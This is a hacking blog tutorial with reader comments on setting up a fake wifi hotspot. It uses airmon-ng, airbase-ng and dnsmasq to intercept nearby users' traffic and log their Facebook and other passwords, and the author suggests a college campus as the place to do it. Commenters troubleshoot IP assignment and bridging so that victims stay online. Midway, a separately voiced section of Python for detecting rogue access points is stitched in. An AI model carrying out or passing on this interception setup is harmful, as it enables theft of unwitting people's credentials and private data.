Well .. today after a long time I am writing a tutorial. I had even bought www.achutetech.com for a year, but I didn't post anything there so it just lapsed. I am sorry for not keeping up .. but now I am trying to continue this blog by posting about the things that I am trying these days...
Let's cut the crap .. and start off with our hacking .. :D
What are we doing today?
Today we will create a fake wifi hotspot so that clients connect to it and we can see what they are up to, even log their Facebook or any other web service passwords if they happen to browse them on our hotspot.
Where can we use this?
Well, you can use it anywhere there are lots of wifi users around, i.e. laptops, smart phones .. which have their wifi on and are searching for wifi networks. I would recommend places like a college campus .. well I use them there :D
Um... So what's the tech behind it?
You will act as a valid wifi hotspot provider .. providing free Internet access to everyone :) . Those who connect to it, you will monitor all their data and then forward it to the real server; you will be acting as a man in the middle.
Intercepting all the data, even changing it to suit your needs, forwarding it to the real server and forwarding the replies back to the client.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET]
What are the tools required?
I use Linux and I suggest you should too, so I will be using Kali Linux. It's a Linux distribution on which all the tools required for hacking are usually pre-installed.
- Linux OS
- Wifi Adapter which supports creating hosted network
- Internet Connection
- a little bit of Patience
- And this site of course, to guide you ;)
Software Required
If you have Kali Linux or even BackTrack or any distribution which has the aircrack-ng suite of tools then you are good .. Else you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type
apt-get update
apt-get install aircrack-ng
NOTE: even Kali and BackTrack users, I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd] and install it once again even if it's already installed.
Next you need to have dnsmasq; to get it type
apt-get install dnsmasq
Now you are ready .. Let's start ..
Setting Up
First we need to gather some information .. plug in your USB wifi adapter if you have one and in terminal / console type
ifconfig
You should see something like this on your screen
There you will see wlan0 or even wlan1 [if you have an extra wifi adapter]. Take a note of what you have and then type
airmon-ng start wlan0
or
airmon-ng start wlan1
depending on what you have. You should be able to see (monitor mode enabled on mon0)
Now that's done .. let's proceed ..
Next we need to monitor the airwaves to get the names of the wifi access points the clients are trying to connect to. To do that type
airodump-ng mon0
You should be able to see a few clients, and under Probe you will find the name of the access point each client is trying to connect to. In this example we see that the client is searching for the wifi access point named achutetech
So we will create a fake AP with the name achutetech and try to make the client connect to us. To do this we type ..
airbase-ng --essid achutetech mon0
In our example we see this
that we have successfully managed to create a fake AP and a client was also successfully associated with it. But the client will still not be fully connected to our AP since we haven't provided it with an IP address. To do so we use dnsmasq
Note: I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them, and I was getting errors like "Interface name is too long" and so on, so I switched to dnsmasq and it seems to work great :D
To verify that we have dnsmasq type
whereis dnsmasq
and to see whether we have the configuration file or not [I have noticed that even though dnsmasq was installed on Kali OS it didn't have the dnsmasq.conf file, so to get it type apt-get install dnsmasq]
and to verify that we have the config file type
ls /etc/ | grep dnsmasq
If dnsmasq.conf is returned then it's well and good. But if not, try
apt-get install dnsmasq
OK, now that we have dnsmasq we need to configure a few things. Type
vim /etc/dnsmasq.conf
[How to use vim - I will be writing a quick tutorial on it soon]
Now scroll down to line 90 or around there; you should see
# interface=
change it to
interface=at0
// at0 is the interface on which our fake AP lies
Now scroll down even more to line 141; you should see
#dhcp-range=192.168.0.50,192.168.0.150,12h
just remove the #
and you are good to go :D
Now we have to supply an IP address to your router [i.e. the fake AP]
To do so type
ifconfig at0 192.168.0.1 up
and to start the DHCP service type
dnsmasq
Now your clients should be able to get an IP address for themselves.
We have finished the configuration part for now .. The fun part will be in the next post :D
Part two is ready - here is the link
MITM - WIFI Honeypot part 2
If you have any problems till now, do comment below. I will try my best to reply, thanks ..
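Seen from the network owner's side, what this setup produces is an open (unencrypted) network reusing a real ESSID from a BSSID that is not in anyone's inventory, and that is exactly what a wireless survey can flag. Here is an added example, not part of the original post: it parses the access point section of an airodump-ng CSV export (the column layout is assumed from that format and the capture itself is constructed) and compares it against a hypothetical inventory of authorised BSSIDs and expected encryption.

```python
import csv
import io

# Constructed sample in the shape of airodump-ng's CSV export (AP section only).
# The column layout is assumed from that format; the rows are made up, not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2014-01-01 10:00:00, 2014-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0, 10, achutetech,
AA:BB:CC:00:00:02, 2014-01-01 10:00:00, 2014-01-01 10:05:00, 11, 54, WPA2, CCMP, PSK, -60, 80, 0, 0.0.0.0, 10, achutetech,
AA:BB:CC:00:00:FF, 2014-01-01 10:03:00, 2014-01-01 10:05:00, 1, 54, OPN, , , -30, 200, 0, 0.0.0.0, 10, achutetech,
DE:AD:BE:EF:00:01, 2014-01-01 10:00:00, 2014-01-01 10:05:00, 1, 54, OPN, , , -70, 50, 0, 0.0.0.0, 9, GuestWifi,
"""

# Hypothetical inventory of the networks we manage: which BSSIDs legitimately
# beacon each ESSID and what encryption the real network uses.
INVENTORY = {
    "achutetech": {"bssids": {"AA:BB:CC:00:00:01", "AA:BB:CC:00:00:02"}, "privacy": "WPA2"},
}

def parse_airodump_aps(text):
    """Return the access-point rows of an airodump-ng CSV as dicts (bssid, essid, privacy)."""
    # station rows follow a blank line after the AP section; ignore them
    ap_section = text.replace("\r\n", "\n").split("\n\n")[0]
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    aps = []
    for row in reader:
        if not row.get("BSSID"):
            continue
        aps.append({"bssid": row["BSSID"].strip().upper(),
                    "essid": row["ESSID"].strip(),
                    "privacy": row["Privacy"].strip()})
    return aps

def find_rogue_aps(aps, inventory):
    """Flag APs that beacon a managed ESSID from an unknown BSSID or with the wrong encryption."""
    findings = []
    for ap in aps:
        expected = inventory.get(ap["essid"])
        if expected is None:
            continue  # not a network we manage; nothing to compare against
        reasons = []
        if ap["bssid"] not in expected["bssids"]:
            reasons.append("BSSID not in inventory")
        if ap["privacy"] != expected["privacy"]:
            # an airbase-ng twin without encryption shows up as OPN where WPA2 is expected
            reasons.append(f"advertises {ap['privacy']}, expected {expected['privacy']}")
        if reasons:
            findings.append((ap["bssid"], ap["essid"], "; ".join(reasons)))
    return findings
```

Run `find_rogue_aps(parse_airodump_aps(SAMPLE_CSV), INVENTORY)` and only the open achutetech twin from the unlisted BSSID is reported; GuestWifi is ignored because it is not in the inventory.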
Help!

I have got a problem.
It says failed to bind dhcp server socket. Already in use

I get the access point started but when I try to connect to it they are not getting any IP addresses. Don't know what's wrong..... need help figuring this out

Help! I get the access point started but clients aren't assigned any IP addresses. When I try to use the browser on the associated machine it says no internet connection

@Angchung .. That means another service is using the same port. My best guess: restart your laptop and try once more. If the problem persists, I will try to solve it on my laptop and let you know..

@Kemp Ross, if the other devices are not getting an IP address that means something is wrong with the DHCP server. Please read the above mentioned steps to configure dnsmasq. If it still fails, I will be happy to guide you.

How to share the internet connection (from eth0, wlan1/0, pppoe0) to at0? It is no use if the victim doesn't get internet when connecting to our fake AP. (I did read part 2)

Yes, in order to do that we need to bridge the interfaces using the "brctl" command.
It is generally not available in Kali Linux so you need to install it using
"apt-get install bridge-utils"
Try to search for the brctl command on Google .. If you aren't able to do it, I will try to recreate the scenario on my own laptop and let you know.

My devices don't get an IP. The .config is as you described. And it looks like the server is starting. I've been trying to make a rogue AP for almost a week now, and your guide is by far the easiest and most self-explaining. But please help me and the others with the IP problem.
This is another method I don't get to work, can anyone see what I'm doing wrong?

$ ifconfig
#My internet is coming from wlan1 "inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0"
$ airmon-ng start wlan0
$ airbase-ng --essid "FakeAP" mon0
######This far everything is OK, I can see the "FakeAP" from other computers. But I need to assign IPs.
#Verify details of logical access point interface
$ ifconfig at0
at0 Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
#Create a bridge interface (To check, I've bridged at0 to wlan1 (internet) and wlan0 (mon0))
$ brctl addbr myBridge
#Now, associate real interfaces (wlan1 and at0) to bridge interfaces
#I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
$ brctl addif myBridge wlan1
$ brctl addif myBridge at0
#Verify details of new bridge interface
$ brctl show
#bridge name bridge id STP enabled interfaces
#myBridge 8000.1008b11ebeb7 no at0
wlan1
######Looks like wlan1 (internet) and at0 ("FakeAP"?) are connected.
#Remove the IP address of wlan1 and at0 interfaces
$ ifconfig wlan1 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
#Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
$ ifconfig myBridge 192.168.0.104/8 up
$ ifconfig myBridge
myBridge Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
inet addr:192.168.0.104 Bcast:192.255.255.255 Mask:255.0.0.0
inet6 addr: fe80::1208:b1ff:fe1e:beb7/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:648 (648.0 B)
######It looks like my bridge has an assigned IP. The one from wlan1
#Enable IP forwarding on your computer. In other words, your computer will work as a router. It will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
######Try to restart "FakeAP"
$ airbase-ng --essid "FakeAP" mon0
16:06:20 Created tap interface at0
16:06:20 Trying to set MTU on at0 to 1500
16:06:20 Access Point with BSSID 10:08:B1:1E:BE:B7 started.
Error: Got channel -1, expected a value > 0.
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
######And the last lines just repeat themselves, and the computer trying to connect doesn't get an IP. What am I doing wrong?